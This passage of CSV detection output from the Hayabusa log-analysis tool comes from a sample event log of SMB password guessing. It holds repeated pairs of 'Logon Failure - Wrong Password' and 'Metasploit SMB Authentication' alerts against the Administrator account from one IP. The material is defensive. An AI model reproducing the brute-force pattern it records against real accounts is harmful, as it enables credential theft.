SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TT7iOtVMFcEysCcI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1NJpI7KC3gj99aWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H39cv9JEuLEjlp93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 4p9h1cjLeUzppSZb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0fOpi4vr55QmO6x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GiKI4V6kpkY5zc9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dLmu4n9qZdf3Q5zo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 87iJdX2E0ZJintvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxc4iIHP0kdqQNiG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJIWekwBwcIUWjD1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GdnvboiIDzXTZ8MR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGMPHNpljTlMYeet : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWo4uVFtAbe4IjKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: YAPdDqbMY4rYiuZ3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ai2WCQ3MkWwSeOy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ey1wbsD7w3fs02xP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sVGzidwZICNfLizg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zjGPMJ6RBw48Ejx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MydK8AjPvyyckCEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fqkCliAQMiFffQU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITkku4kN4csBFyUB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g9kMkSFhKrT2Py : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1xKLdwujTmLEc9ts : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: sAW1YzCQ3CreseaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhqBirEHOKPepR3n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uqSFXpzAWOnc90n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: McbeS9lRpbMc48jO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6J0d7dQUmJNKJlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QG3WU91rhTP9odx7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSQRgB8yMfhb03g1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bzbZjRXTc0XvV4Ry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3ShOCSaLGX4YBWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lIrydzi8nmY251Z1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: h4vlRksTGxAqEt9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJMnD0foEDbcNfTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNWppBJLFojEFtiF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7a9Tvr6ruDpiG2T : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBNIizCKz2ybc3eM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YwuXQhISpgfSFqZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeONLdrrauxqvgaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RFqSH4toadsTideV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuMa0Juj1tjL6NDY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UA8zU0kJ6gAFqSaF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jvX85gF8wk3AGJyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpzOMKQIBrkQW5Os : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqzrLAqHNi4CHT56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HWMap8qHlykO6Yeu : IP Address: 192.168.198.149 : AuthPackage: 
